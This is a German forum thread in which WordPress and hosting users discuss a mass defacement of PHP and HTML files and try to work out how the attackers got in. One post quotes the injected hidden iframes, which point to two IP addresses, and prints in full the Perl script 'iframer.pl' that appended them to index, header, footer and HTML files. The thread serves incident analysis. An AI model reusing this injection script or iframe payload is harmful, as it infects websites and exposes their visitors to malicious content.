Ungebetenen Besuch!!!

[LonesomWolf]

In der letzten Nacht hatte mein Weblog ungebetenen Besuch. Fast alle Dateien sind überschrieben worden so dass sie eine Größe von 620 Bytes aufweisen. Beim Aufruf der Seite wird ein weißer iFrame mit einer kleinen Grafik im linken oberen Eck angezeigt. Bei der Verwendeten Wordpressversion handelte es ist um die aktuelle Version 2.5. Wo das Leck gewesen ist kann ich noch nicht sagen, ich bin erstmal damit beschäftigt das Weblog wieder herzustellen. So viel nur mal zu Information.

Wolf

[Söan]

Vielleicht hatte da Jemand Zugriff über FTP?

[jottlieb]

Zitat:

Zitat von Söan

Vielleicht hatte da Jemand Zugriff über FTP?

Ein Plugin mit Lücken reicht auch.

[LonesomWolf]

Also was mittlerweile klar ist, es hatte jemand Zugriff auf den FTP-Server. Denn es wurden nicht nur alle Wordpressdateien überschrieben, es wurden alle auf dem Webspace befindlichen .php Dateien mit dem selben Code überschrieben. Falls jemand Interesse hat, ich habe in hier bei mir auf dem Rechner.
Das einzige Mal, wo ich die Daten "außer Haus" gegeben habe war beim Test der PlugIn-Funktion. Ich hoffe nicht, dass dort eine Lücke existiert. Jedenfalls hatte derjenige kein Interesse an der DB, denn die ist unversehrt geblieben. Aber selbst wenn, dann hätten mir nur ein paar Einträge gefehlt. Denn regelmäßige Datensicherungen der DB wie auch der WP-Installation sind hier selbstverständlich.

[Arno Simon]

Zitat:

Zitat von LonesomWolf

Also was mittlerweile klar ist, es hatte jemand Zugriff auf den FTP-Server. Denn es wurden nicht nur alle Wordpressdateien überschrieben, es wurden alle auf dem Webspace befindlichen .php Dateien mit dem selben Code überschrieben.

nunja, das kann man erst dann sicher bestätigen, wenn man weiss, wie der webspace aufgeteilt ist... ob wp z.b. über eine subdomain oder nur über ein subdirectory angesprochen wird. im falle der subdomain verfügt wp somit eventuell über eine "eigene" root, was jedoch vom server bzw. dessen konfiguration abhängig ist. dies kannst du aber ggf. auch bei deinem hoster erfragen. bei einer eigenen root könnte es sich schon schwieriger gestalten an die verzeichnissangaben der übrigen webspace-bereiche zu kommen. wird nur über ein subdirectory gearbeitet, dürfte dies weniger problematisch sein - in bezug darauf an die entsprechenden verzeichnisse heran zu kommen. es sollte dann durchaus möglich sein, das ein fehlerhaftes plugin (oder auch eine (noch) unbekannte lücke in wp) für die zugriffe bzw. die überschriebenen dateien gesorgt hat.

vG

Arno

[Ronni]

Hier hatte auch jemand ungebetenen Besuch unter 2.5. Cati hat auch die Vorgehensweise beschrieben wie der Hack bei ihr verlaufen ist.

WordPress-Hack, alle Versionen bis 2.5 betroffen« IT (Technik und Internet)

[LonesomWolf]

Als kleine Ergänzung...der Zugriff erfolgte vermutlich nicht über den FTP-Zugang. Die Log-Daten für den vermuteten Zeitraum sind vollkommen in Ordnung. Was die access-zugriffe angeht, da bin ich noch am durchforsten. Aber es sind sooooo viele.
Allerdings bekomme ich die Daten von gestern erst am morgigen Tag. Sollte der Zugriff also erst gestern am Tag erfolgt sein, dann sehe ich das morgen.

[nexenator]

Heute hat es einen unserer Server erwischt. Ähnlich wie bei LonesomWolf wurden sehr viele Dateien überschrieben. Um genau zu sein: alle *index.php, *header.php, *footer.php, *.htm und *.html Dateien. Jeder dieser Dateien wurden zwei (2) iframes angehängt:

HTML-Code:

<iframe src="hXXp://124.217.252.62/~admin/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> <iframe src="hXXp://203.169.139.76/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

(http durch hXXp getauscht)

Durchgeführt wurde dies mithilfe eines perl scripts namens iframer.pl welche folgenden code enthält:

Code:

#!/usr/bin/perl

use File::Find;

$iframe = '<iframe src="http://124.217.252.62/~admin/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://203.169.139.76/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>';

sub process_file {
if($File::Find::name =~ /index\.php/i || $File::Find::name =~ /footer\.php/i || $File::Find::name =~ /header\.php/i || $File::Find::name =~/\.htm$/i || $File::Find::name =~/\.html$/i){
open(FILE,">>$File::Find::name");
print $File::Find::name."\r\n";
print FILE $iframe;
close(FILE);
}
}
find(\&process_file,@ARGV);

Die Logfiles werden zur Zeit noch ausgewertet. Daher ist momentan noch unklar auf welche Weise diese iframer.pl auf den Server gelangt ist und wie sie ausgeführt wurde. Fest steht, dass der Angriff unmittelbar (innerhalb von ca.10 min und zeitgleich mit Listung in Google-Blog-Suche) nach einem neuen Blogpost per WordPress 2.5.1 erfolgte. Ob dies aber nur Zufall war oder ob tatsächlich ein Zusammenhang besteht ist derzeit ebenfalls noch unklar.

@LonesomWolf: bei welchem Provider liegt Dein Blog? Hast Du möglicherweise auch eine iframer.pl oder ähnliches auf den server gelegt bekommen?

[Soilworker]

Scheint nicht auf Wordpress beschränkt zu sein. Hier hat jemand das Problem bei Joomla:
[Problème] - Code maveillant injection d'une iframe 124.217... dans plusieurs fichiers... - Forums Joomlafacile

[codestyling]

Einer der betroffenen Hoster scheint all-inkl.com zu sein (laut Denic).
Kann jemand bestätigen, das es dort mehrere Blogs "erwischt" hat ?

Ein Kompromittierung eines Massenhosters (auf einem Server laufen ca. 500++ Domains) würde es erlauben, beliebigen Domains dort was unterzuschieben.

Das würde auch erklären, warum es auch Joomla erwischen kann, wie im vorherigen Post in Frankreich gefunden wurde.